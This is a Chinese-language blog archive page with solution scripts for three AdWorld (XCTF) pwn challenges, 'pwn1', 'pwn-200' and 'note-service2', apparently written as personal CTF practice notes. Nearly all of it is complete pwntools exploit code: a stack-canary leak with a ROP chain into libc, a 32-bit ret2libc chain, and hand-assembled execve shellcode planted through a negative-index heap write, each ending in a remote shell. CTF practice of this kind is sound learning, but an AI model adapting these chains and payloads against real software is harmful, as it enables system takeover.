日度归档:15 2 月, 2020

AdWorld Pwn pwn1

发表评论

Canary泄露入门题:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4598&page=1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
from LibcSearcher import *
import os
context.log_level="debug"
context(arch="amd64",os="linux")

ROP_PopRdi = 0x400a93
ROP_Ret = 0x40067e
ADDR_GOT_read = 0x600FD0
ADDR_PLT_puts = 0x400690
ADDR_SYM_main = 0x400908

p = remote("111.198.29.45",38563)
#p = process("./babystack")
p.sendlineafter(">> ","1")
payload1 = b'0'*0x88
p.sendline(payload1)
p.sendlineafter(">> ","2")
p.recvuntil("00\n")
canary = u64(b"\x00" + p.recv(7))

print(hex(canary))
p.sendlineafter(">> ","1")
payload2 = b'0'*0x88 + p64(canary) + p64(0) + p64(ROP_PopRdi) + p64(ADDR_GOT_read) + p64(ADDR_PLT_puts) + p64(ADDR_SYM_main)
p.sendline(payload2)
p.sendlineafter(">> ","3")

GOT_read = p.recvuntil("\n").split()[0]
for i in range(len(GOT_read),8):
    GOT_read += b'\x00'
GOT_read = u64(GOT_read)

libc = LibcSearcher("read",GOT_read)
ADDR_LibC_base = GOT_read - libc.dump("read")
ADDR_system = ADDR_LibC_base + libc.dump("system")
ADDR_String_Sh = ADDR_LibC_base + libc.dump("str_bin_sh")
p.sendlineafter(">> ","1")
payload3 = b'0'*0x88 + p64(canary) + p64(0) + p64(ROP_Ret) + p64(ROP_PopRdi) + p64(ADDR_String_Sh) + p64(ADDR_system)
p.sendline(payload3)
p.sendlineafter(">> ","3")

p.interactive()

AdWorld Pwn pwn-200

发表评论

学了64位的ROPGadgets就把32位咋传参的搞忘了???
https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4847&page=1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *
from LibcSearcher import *
import time
context.log_level="debug"
context(arch="amd64",os="linux")

z = remote('111.198.29.45',49363)
z.recvuntil("Welcome to XDCTF2015~!\n")
elf = ELF("./pwn")
write_plt = elf.plt['write']
read_got = elf.got['read']
main_addr = 0x80484be
payload = b'a'*0x6c + p32(0) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4) + b'a'*(0x100-6*4-0x6c)
z.send(payload)
read_addr = u32(z.recv(4))
print(hex(read_addr))
libc = LibcSearcher('read',read_addr)
libc_addr = read_addr - libc.dump('read')
sys_addr = libc_addr + libc.dump('system')
binsh_addr = libc_addr + libc.dump('str_bin_sh')
payload2 = b'a'*0x6c + p32(0) + p32(sys_addr) + p32(0) + p32(binsh_addr) + b'a'*(0x100-4*4-0x6c)
z.send(payload2)
z.interactive()

有两点要注意:一个是read函数会不多不少的读入给定的字节数,不需要换行,如果多打了换行是会算到下一个read里的。
(更新:用换行可以提前结束read函数,且这个换行符会被读入)
还有一个问题是又和64位搞混了。把栈布局成了write_plt,1,read_got,4,main_addr的结构。这是错误的。栈应该如下布置:call_function,return_function,var_1,var_2,…

AdWorld Pwn note-service2

发表评论

新接触的一道题,新题型。。
https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4611&page=1
Writeup: https://adworld.xctf.org.cn/media/uploads/writeup/ee65882803c511ea9f5700163e004e93.pdf
开眼23333。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
from LibcSearcher import *
context.log_level="debug"
context(arch="amd64",os="linux")

def create(p,index,size,content):
    p.sendlineafter("your choice>> ","1")
    p.sendlineafter("index:",str(index))
    p.sendlineafter("size:",str(size))
    p.sendafter("content:",content)

def delete(p,index):
    p.sendlineafter("your choice>> ","4")
    p.sendlineafter("index:",str(index))

p = remote("111.198.29.45",34191)
#p = process("./1")

ASM = []
ASM.append(asm("xor rax,rax") + b"\x90\x90\xeb\x19")
ASM.append(asm("mov eax,0x3b") + b"\xeb\x19")
ASM.append(asm("xor rsi,rsi") + b"\x90\x90\xeb\x19")
ASM.append(asm("xor rdx,rdx") + b"\x90\x90\xeb\x19")
ASM.append(asm("syscall") + b"\x90\x90\x90\x90\x90")

for i in range(0,5):
    create(p,i,8,ASM[i])
delete(p,0)
create(p,-8,8,ASM[0])
p.sendlineafter("your choice>> ","/bin/sh")

p.interactive()

附上i64db:
1f10c9df3d784b5ba04b205c1610a11e